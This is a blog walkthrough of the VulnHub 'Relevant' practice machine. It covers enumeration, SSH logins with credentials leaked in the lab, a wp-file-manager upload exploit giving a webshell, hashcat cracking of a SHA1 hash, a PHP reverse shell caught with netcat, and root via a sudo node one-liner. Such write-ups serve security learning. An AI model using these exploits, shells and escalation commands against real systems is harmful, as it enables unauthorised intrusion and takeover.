VulnHub Relevant Walkthrough – More WordPress Exploitation

The next machine that I solved was VulnHub Relevant, and it was another good one.

VulnHub Relevant Walkthrough - Introduction

If you haven't read my last walkthrough, then I can recommend it.

This time, it's Relevant by iamv1nc3nt, which you can download here.

VulnHub Relevant - Login prompt


First, I did an Nmap sweep of my network to get my target's IP address.

kali@kali:~/VulnHub/relevant$ sudo nmap -sP
[sudo] password for kali:
Starting Nmap 7.80 ( ) at 2020-10-01 19:03 EDT


Nmap scan report for cybersploit (
Host is up (0.00017s latency).
MAC Address: 08:00:27:15:FF:E0 (Oracle VirtualBox virtual NIC)

Next, I used Nmap again and saw that ports 22 and 80 were open on my target.

kali@kali:~/VulnHub/relevant$ sudo nmap -A
Starting Nmap 7.80 ( ) at 2020-10-01 19:12 EDT
Nmap scan report for
Host is up (0.00028s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Database Error
MAC Address: 08:00:27:15:FF:E0 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.28 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds

For more web enumeration, I ran dirsearch against the host. I'm loving this tool and should have started using it instead of dirb a while ago.

kali@kali:~/VulnHub/relevant$ python3 ~/tools/dirsearch/ -u -e php,txt,cnf,conf -w /usr/share/wordlists/dirbuster/*medium*txt

_|. _ _  _  _  _ _|_    v0.3.9                                                                                   
(_||| _) (/_(_|| (_| )                                                                                            
Extensions: php, txt, cnf, conf | HTTP method: GET | Threads: 12 | Wordlist size: 220521

Error Log: /home/kali/tools/dirsearch/logs/errors-20-10-01_19-16-53.log

Output File: /home/kali/tools/dirsearch/reports/

[19:16:53] Starting:
[19:16:53] 500 -    3KB - /    
[19:16:54] 301 -  178B  - /wp-content  ->
[19:16:55] 301 -  178B  - /wp-includes  ->
[19:17:13] 301 -  178B  - /wp-admin  ->
Task Completed              

When I went to the home page of the web application, I saw a database connection error with a few links.

Database connection error

First, the imgbb link took me to a QR code.

QR code

When I decoded the QR code, I saw that it was a OTP auth code.

Message #vulnhub

Next, the Pastebin page had a list of usernames and passwords.

VulnHub Relevant - Pastebin credentials

I grabbed these credentials and put them into a local file. Once I got to the 'patsy' user, I received a prompt for a verification code.

kali@kali:~/VulnHub/relevant$ cat creds.txt
cardib : CardiCardiBacardi
cline : Hello^Dear^Kitten
edward : $cissor-Hands
kevin : Fish$Called-->
michael : abc123YouAndMe
patsy : Crazy%for%Falling
thriller : CuzThisIsThriller!
wanda : Franks&Beans&Mustard
willy : Wonka&TheChocolateFactory
webmaster : Google'sAllTheThings
kali@kali:~/VulnHub/relevant$ ssh cline@
kali@kali:~/VulnHub/relevant$ ssh edward@
kali@kali:~/VulnHub/relevant$ ssh kevin@
kali@kali:~/VulnHub/relevant$ ssh michael@
kali@kali:~/VulnHub/relevant$ ssh patsy@
Verification code:

Next, I installed the OTP code into my Google Authenticator, and I was able to successfully login!

kali@kali:~/VulnHub/relevant$ ssh patsy@
Verification code:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-48-generic x86_64)

* Documentation:
* Management:
* Support:

  System information as of Thu 01 Oct 2020 11:21:26 PM UTC

  System load:  0.16              Processes:               113
  Usage of /:   51.4% of 8.79GB   Users logged in:         0
  Memory usage: 30%               IPv4 address for enp0s3:
  Swap usage:   0%

* Kubernetes 1.19 is out! Get it in one command with:

     sudo snap install microk8s --channel=1.19 --classic has docs and details.

0 updates can be installed immediately.
0 of these updates are security updates.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep 21 19:10:51 2020 from
This account is currently not available.
Connection to closed.

Initial Foothold

While on the box as the 'patsy' user, I was unable to find any avenues for escalation, so I went back to the web vector.

WordPress readme

First, I navigated around the WordPress site, but ran into some error pages.

WordPress error page

Next, I ran WPScan and found a few potentially interesting plugins.

kali@kali:~/VulnHub/relevant$ wpscan --url --force
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic -
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

[+] URL: []
[+] Started: Thu Oct  1 19:28:18 2020


[i] Plugin(s) Identified:

[+] akismet
| Location:
| Latest Version: 4.1.6 (up to date)
| Last Updated: 2020-08-10T16:49:00.000Z
| Readme:
| Found By: Known Locations (Aggressive Detection)
|  -, status: 200
| Version: 4.1.6 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
|  -
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
|  -

[+] wp-file-manager
| Location:
| Last Updated: 2020-09-14T19:30:00.000Z
| Readme:
| [!] The version is out of date, the latest version is 6.9
| Found By: Known Locations (Aggressive Detection)
|  -, status: 200
| Version: 6.7 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
|  -

When I visited the File Manager page, it looked like an older version of the wp-file-manager plugin.

VulnHub Relevant - File Manager

After some searching, I found a vulnerability and exploit for this plugin.

Using the elFinder exploit, I got code execution as the www-data user!

kali@kali:~/VulnHub/relevant$ python
Usage: http://localhost
URL Shell: %s/wp-content/plugins/wp-file-manager/lib/files/x.php?cmd=<CMD>
$ id
H��\�}JW�+z�k��m=LW���-h��{1�   -)�t�\R�u��ux��������ɼ�
&�����Ϳ�wT����P�ʟ�����w��|�3������x�5p� e��~�� e���2߿y�IgR�y�]��;��g�|G+?�`����::_^|���:k�����V��Yf|���X��~����2o�քqɇ/%_�k��![=<>���@�3��{���6�   /�R�;���Pƿ������"z>ċ�#�73㋞���▒��|��wa=�_�z_��W��T��/e��s��%�3��/� ������Y��o����&�S�sc�-�ʁ���'ێF��+���{���`���B|�;��PM�Q�B�M
                                                                                                          �@�X}� ���]�^z���$����d�W��n�%~m�#5��0���pzh$
                                                                                        l�uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, I looked at the wp-config file, but the DB_PASSWORD was just a red herring.

* The base configuration for WordPress
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
* This file contains the following configurations:
* * MySQL settings
* * Secret keys
* * Database table prefix
* @link
* @package WordPress

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'DidYouThinkItWouldBeThatEasy?TryHarder!' );

There were a few home directories on the system, including the previously compromised patsy user.

drwxr-xr-x  5 root     root     4096 Sep 21 19:50 .
drwxr-xr-x 20 root     root     4096 Sep 21 13:57 ..
drwxr-xr-x  4 h4x0r    h4x0r    4096 Sep 21 20:16 h4x0r
drwxr-xr-x  3 patsy    patsy    4096 Oct  1 23:21 patsy
drwxr-xr-x  3 relevant relevant 4096 Sep 21 20:27 relevant

Lateral Movement

With access to the www-data and patsy users, it was time to move to a user account that could escalate to root.

drwxr-xr-x 4 h4x0r h4x0r 4096 Sep 21 20:16 .
drwxr-xr-x 5 root  root  4096 Sep 21 19:50 ..
drwxr-xr-x 2 h4x0r h4x0r 4096 Sep 21 20:15 ...
lrwxrwxrwx 1 h4x0r h4x0r    9 Sep 21 20:16 .bash_history -> /dev/null
-rw-r--r-- 1 h4x0r h4x0r  220 Sep 21 19:50 .bash_logout
-rw-r--r-- 1 h4x0r h4x0r 3771 Sep 21 19:50 .bashrc
drwxrwxr-x 3 h4x0r h4x0r 4096 Sep 21 20:06 .local
-rw-r--r-- 1 h4x0r h4x0r  807 Sep 21 19:50 .profile

First, I found a note.txt file in the h4x0r directory, which contained some sort of hashed or encoded value.

$ cat /home/h4x0r/.../note.txt
H��\�}JW�+z�k��m=LW���-h��{1�   -)�t�\R�u��ux��������ɼ�
&�����Ϳ�wT����P�ʟ�����w��|�3������x�5p� e��~�� e���2߿y�IgR�y�]��;��g�|G+?�`����::_^|���:k�����V��Yf|���X��~����2o�քqɇ/%_�k��![=<>���@�3��{���6�   /�R�;���Pƿ������"z>ċ�#�73㋞���▒��|��wa=�_�z_��W��T��/e��s��%�3��/� ������Y��o����&�S�sc�-�ʁ���'ێF��+���{���`���B|�;��PM�Q�B�M
                                                                                                          �@�X}� ���]�^z���$����d�W��n�%~m�#5��0���pzh$
                                                                                        l�news : 4C7EB317A4F4322C325165B4217C436D6E0FA3F1

Using hashcat, I was able to crack this SHA1 hash in just over an hour. Note: If you are creating a vulnerable machine, I recommend just picking a password from the RockYou list, to prevent unnecessary cracking time.

kali@kali:~/VulnHub/relevant$ hashcat -m 100 relevant-hash.txt -r ~/tools/password_cracking_rules/OneRuleToRuleThemAll.rule ~/tools/cracking/rockyou.txt
hashcat (v5.1.0-1397-g7f4df9eb) starting...

OpenCL API (OpenCL 1.2 (Jun 23 2019 21:50:55)) - Platform #1 [Apple]
* Device #1: Intel(R) Core(TM) i9-9880H CPU @ 2.30GHz, skipped
* Device #2: Intel(R) UHD Graphics 630, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 560X Compute Engine, 1024/4096 MB allocatable, 16MCU


[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Name........: SHA1
Hash.Target......: 4c7eb317a4f4322c325165b4217c436d6e0fa3f1
Time.Started.....: Sun Oct 11 13:00:27 2020 (18 mins, 56 secs)
Time.Estimated...: Sun Oct 11 14:34:09 2020 (1 hour, 14 mins)
Guess.Base.......: File (/Users/raymond.doyle/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/raymond.doyle/tools/password_cracking_rules/OneRuleToRuleThemAll.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 22439.1 kH/s (10.18ms) @ Accel:4 Loops:32 Thr:64 Vec:1
Speed.#3.........:   105.5 MH/s (21.12ms) @ Accel:32 Loops:64 Thr:64 Vec:1
Speed.#*.........:   128.0 MH/s
Recovered........: 0/1 (0.00%) Digests
Progress.........: 171704682496/745836298075 (23.02%)
Rejected.........: 0/171704682496 (0.00%)
Restore.Point....: 3276800/14344385 (22.84%)
Restore.Sub.#2...: Salt:0 Amplifier:22752-22784 Iteration:0-32
Restore.Sub.#3...: Salt:0 Amplifier:26496-26560 Iteration:0-64
Candidates.#2....: mektechmeier -> teamoiAlekitok
Candidates.#3....: te0ia209862 -> techm2009n77

Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 4c7eb317a4f4322c325165b4217c436d6e0fa3f1
Time.Started.....: Sun Oct 11 13:00:27 2020 (1 hour, 8 mins)
Time.Estimated...: Sun Oct 11 14:08:34 2020 (0 secs)
Guess.Base.......: File (/Users/raymond.doyle/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/raymond.doyle/tools/password_cracking_rules/OneRuleToRuleThemAll.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 24557.0 kH/s (10.55ms) @ Accel:4 Loops:32 Thr:64 Vec:1
Speed.#3.........:   123.8 MH/s (14.49ms) @ Accel:32 Loops:64 Thr:64 Vec:1
Speed.#*.........:   148.3 MH/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 592495032320/745836298075 (79.44%)
Rejected.........: 0/592495032320 (0.00%)
Restore.Point....: 11374592/14344385 (79.30%)
Restore.Sub.#2...: Salt:0 Amplifier:8320-8352 Iteration:0-32
Restore.Sub.#3...: Salt:0 Amplifier:21376-21440 Iteration:0-64
Candidates.#2....: volcanoAugust102008 -> anonimoApRiL197630
Candidates.#3....: brat722map -> michellAugust112

Started: Sun Oct 11 13:00:26 2020
Stopped: Sun Oct 11 14:08:35 2020

Unfortunately, I was unable to login as this 'news' user with the current Python shell that I was using.

That said, I found another blog post and exploit.

Using this new exploit, I was able to upload a PHP reverse shell to the host.

kali@kali:~/VulnHub/relevant$ cp reverse.php payload.php
kali@kali:~/VulnHub/relevant$ python3
Just do it... URL:

After uploading this shell, I went to the specified directory on the target.

PHP reverse shell payload

On my attacker box, I caught this connection, and had a more useful TTY!

kali@kali:~/VulnHub/relevant$ nc -lvp 4444
listening on [any] 4444 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 40342
Linux relevant 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
23:48:39 up 30 min,  0 users,  load average: 0.00, 0.00, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

VulnHub Relevant - Privilege Escalation

First, using my new TTY, I switched to the 'news' user with the previously cracked password.

$ su - news
Password: backdoorlover
su: warning: cannot change directory to /var/spool/news: No such file or directory
uid=9(news) gid=9(news) groups=9(news)

Next, I checked my sudo privileges, and saw that I could run the /usr/bin/node command.

sudo -l -S
[sudo] password for news: backdoorlover
Matching Defaults entries for news on relevant:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User news may run the following commands on relevant:
    (ALL : ALL) /usr/bin/node

I looked at the GTFObins page, to verify that I was familiar with the node privilege escalation.

With this command, I executed node, and obtained my root shell!

sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'

uid=0(root) gid=0(root) groups=0(root)

Finally, I grabbed the flag file, and finished off the target.

Flag captured

Video Highlight

If you'd rather watch the stream highlight rather than read all this text, then you can find it here.

To catch me live, be sure to follow me on Twitch!

VulnHub Relevant Walkthrough - Conclusion

This was a fun box and troubleshooting the WordPress exploit was an interesting challenge.

I know that there have been a ton of VulnHub posts recently, but I am still catching up on all my stream highlights.

In the meantime, let me know if there is any other content that you'd like to see, or just come on over and watch/follow/subscribe to the Twitch channel!

doyler on Githubdoyler on Twitter
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

As an Amazon Associate I earn from qualifying purchases.

Common passed on this blog, I made it to a jam.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *


This site uses Akismet to reduce spam. Learn how your comment data is processed.